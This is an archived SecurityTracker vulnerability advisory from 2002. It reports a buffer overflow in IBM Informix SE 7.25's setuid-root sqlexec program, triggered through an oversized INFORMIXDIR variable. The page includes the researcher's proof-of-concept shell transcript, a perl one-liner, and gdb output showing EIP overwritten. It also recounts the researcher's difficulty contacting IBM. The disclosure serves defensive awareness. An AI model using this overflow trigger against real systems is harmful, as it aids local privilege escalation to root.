Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Database)  >   Informix Vendors:   IBM
IBM Informix SE Database Buffer Overflow in Processing the 'INFORMIXDIR' Environment Variable May Allow Local Users to Obtain Root Privileges
SecurityTracker Alert ID:  1004420
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 30 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): Informix SE-7.25
Description:   A vulnerability was reported in the IBM's Informix Standard Engine (SE). A local user may be able to obtain root level privileges in certain situations.

It is reported that a local user can trigger a buffer overflow in the processing of the INFORMIXDIR enviroment variable by setting the variable to a value with a size greater than 2023 bytes.

According to the report, the 'sqlexec' program is configured with set user id (suid) root privileges and set group id (sgid) 'informix' group privileges.

A demonstration exploit transcript is provided:

[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'`
[pask@dimoni lib]$ ./sqlexec
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
[pask@dimoni lib]$ ./sqlexec
Segmentation fault

This overflow allows a local user to overwrite the EIP register and cause arbitrary code to be executed on the system with root level privileges.

The local user must, of course, have execute privileges for the /lib/sqlexec program.

The vendor has reportedly been notified. [Editor's note: Although IBM has apparently been notified, it appears that there may be a lack of sufficient internal communications within IBM and the part of IBM responsible for Informix may not have been notified.]

Impact:   A local user may be able to execute arbitrary code with root level privileges to gain root access on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any)

Message History:   None.

 Source Message Contents

Subject:  Informix SE-7.25 /lib/sqlexec Vulnerability


 Title:    Local Vulnerability in Informix SE-7.25
 Date:     21-04-2002
 Platform: Only tested in Linux but can be exported to others.
 Impact:   Users with exec perm over /lib/sqlexec can obtain euid=0 
 Author:   Juan Manuel Pascual Escriba <>
 Status:   Vendor contacted details below.


    Buffer overflow exists if INFORMIXDIR enviroment variable is defined
with a size greater than 2023 bytes

[pask@dimoni lib]$ ls -FAlsc
total 2588
   4 drwxrwxr-x    2 informix informix     4096 May 28 22:50 boom/
1484 -rwsr-sr-x    1 root     informix  1515480 Apr 20 22:09 sqlexec*
 504 -rwxr-xr-x    1 informix informix   510283 Apr 20 22:09 sqlexecd*
 596 -rwxr-xr-x    1 informix informix   606041 Apr 20 22:09 sqlrm*

[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'` 
[pask@dimoni lib]$ ./sqlexec
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
[pask@dimoni lib]$ ./sqlexec
Segmentation fault

[pask@dimoni lib]$ gdb ./sqlexec
(gdb) r
Starting program: /home/informix/SE-7.25/lib/./sqlexec
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info registers
esp            0x3fffed08       0x3fffed08
ebp            0x41414141       0x41414141
esi            0x3fffedf9       1073737209
edi            0x8191571        135861617
eip            0x41414141       0x41414141

    Users with exec perm over /lib/sqlexec can obtain euid=0 
in a standard installation of Informix SE-7.25

    Will be available when IBM develops a patch.

    At 21th April i tried to contact with IBM through,i received a quick answer 
telling me that i can email for 
report this vulnerability. This email address dont exist 
or is misconfigured (i received the message returned).

   At 28th May i tried to contact with IBM through, they answer the email telling me 
"to call to Main support Line and choose option 3 to speak 
customer service representative who will be happy to assist 

I'm sorry but im not happy to pay an international call bill.
and im not a customer.

   Status of this advisory would be checked at:

- --------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba  

- -- 

		   "In god We Trust, Others We monitor"

			Juan Manuel Pascual Escriba
		     Midnight Systems & Security Manager
    	   PGP PubKey

Version: PGP 6.5.8



Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, LLC